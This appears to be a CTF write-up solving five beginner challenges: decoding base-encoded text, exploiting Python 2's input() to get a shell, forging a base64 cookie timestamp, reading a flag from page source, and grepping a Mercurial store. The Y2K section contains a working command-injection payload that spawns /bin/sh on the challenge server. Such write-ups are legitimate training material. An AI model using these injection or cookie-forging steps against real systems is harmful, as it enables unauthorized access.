Baseball
Description
I found this baseball… but… it doesn’t really look like a baseball?
Download the file below.
Solution
If we open the file, we will get this text:
1
TzRaVUNVMlRNRTRIQTZMSFBGWkdTNVpTSzVZVU1ZSllIQk5ER00zREdKTkhBVTJWSkJHVkNWMllPRlVFSzMyRE9GTUVNMkNaR0Y1RU1VUlpNUlNHS1JSWE9CQ1VVU1pZSk4ySEFWVFVPVTJGQzJDV000WlUyUVNHSlpBVFNNUT0=
From this it must be some base that it used to encode. To solve this, i using the https://gchq.github.io/CyberChef to decode automatically encoding.
Flag
Flag : flag{wow_you_hit_a_homerun_and_really_ran_the_bases_there}
Y2K
Description
They told us the world was going to end in the year 2000! But it didn’t… when will the world end?
Open the Deployment tab to start this challenge.
Solution
If we open the deployment tab, we will get IP and Port address that we can connect using netcat:
1
2
3
4
5
$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
2021
Yeah! I agree with you! I also think the world will end in the year
2021
If we enter a character it will show an error:
1
2
3
4
5
6
7
8
$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
a
Traceback (most recent call last):
File "/home/challenge/server.py", line 4, in <module>
end = input()
File "<string>", line 1, in <module>
NameError: name 'a' is not defined
We can also used input an array:
1
2
3
4
5
$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
["test"]
Yeah! I agree with you! I also think the world will end in the year
['test']
Then after researching, i found this article https://medium.com/@abdelazimmohmmed/python-input-vulnerability-30b0bfea22c9, where we can used __builtin__ module to get maybe some shell into the server.
1
__import__("os").system("uname -a")
1
2
3
4
5
6
$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
__import__("os").system("uname -a")
Linux yk-61e1f26e0948798d-6b7c6db577-pkgn7 4.19.112+ #1 SMP Fri Sep 4 12:00:04 PDT 2020 x86_64 Linux
Yeah! I agree with you! I also think the world will end in the year
0
As you can see from the above example, we will get the linux output version of the server. Changing the system into “/bin/sh” will give us a shell on the server.
1
__import__("os").system("/bin/sh")
1
2
3
4
5
6
7
8
$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
__import__("os").system("/bin/sh")
ls
flag.txt
server.py
cat flag.txt
flag{we_are_saved_from_py2_k}
Flag
Flag : flag{we_are_saved_from_py2_k}
References
EZ Bake Oven
Description
Do you like baking? Don’t leave the oven on for too long!
Open the Deployment tab to start this challenge.
Solution
If we visit the website, we will find the user interface like this image.
Then if we see the JS of the website, there is only one script tag in the website.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
function cook(recipe) {
data = {
"recipe": recipe
}
fetch("/cook", {
method: "POST",
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
}).then(res => {
if (res.status != 200) {
res.json().then((json) => {
console.log("Error " + json.message)
}).catch(() => {
console.log("Error")
});
} else {
res.json().then((json) => {
console.log("Success")
location.reload();
}).catch(() => {
console.log("Error")
});;
}
});
};
// Set the date we're counting down to
var countDownDate = new Date("2020-09-26 13:39:54");
countDownDate.setSeconds(countDownDate.getSeconds() + 432000);
countDownDate = countDownDate.getTime();
// Update the count down every 1 second
var x = setInterval(function () {
// Get today's date and time
var nowUTC = new Date(new Date().toUTCString().substr(0, 25));
// Find the distance between nowUTC and the count down date
var distance = countDownDate - nowUTC;
// Time calculations for hours, minutes and seconds
var hours = Math.floor(distance / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);
// Display the result in the element with id="demo"
document.getElementById("timer").innerHTML = hours + "h "
+ minutes + "m " + seconds + "s ";
// If the count down is finished, write some text
if (distance < 0) {
clearInterval(x);
location.reload();
}
}, 1000);
From the script we can see that it will do post request into /cook with data {“recipe” : recipe_name}. Then i try to change the distance variable so we can finished the cooking process. But setting it to minus number, doesn’t give us the flag.
So i try looking at the cookies, as the recipe says, magic cookies. The cookies looks like base64 where if we used terminal commands will produce the output like this:
1
2
$ echo "eyJyZWNpcGUiOiAiTWFnaWMgQ29va2llcyIsICJ0aW1lIjogIjA5LzI2LzIwMjAsIDEzOjQ0OjU4In0=" | base64 -d
{"recipe": "Magic Cookies", "time": "09/26/2020, 13:44:58"}
Then we can using the result we found and change the time value to next year:
1
2
$ echo '{"recipe": "Magic Cookies", "time": "09/30/2019, 13:44:58"}' | base64
eyJyZWNpcGUiOiAiTWFnaWMgQ29va2llcyIsICJ0aW1lIjogIjA5LzMwLzIwMTksIDEzOjQ0OjU4In0=
Flag
Flag : flag{you_are_the_master_baker}
Read The Rules
Description
Please follow the rules for this CTF!
Connect here: https://bsidesbos.ctf.games/rules
Solution
By inspecting the element of the website, we will see the flag.
Flag
Flag : flag{its_time_to_hack}
Mercury
Description
This ZIP file is hanging out with the stars in the Milky Way! Can you find the flag?
Download the file below.
Solution
To solve this, i unzip the downloaded file and search to get the flag. In the end, i found the flag on the folder /mercury/.hg/store/data where we can strings all of the data and get the flag.
1
2
/mercury/.hg/store/data$ strings * | grep -oE "flag{.*}"
flag{version_control_for_the_solar_system}
Flag
Flag : flag{version_control_for_the_solar_system}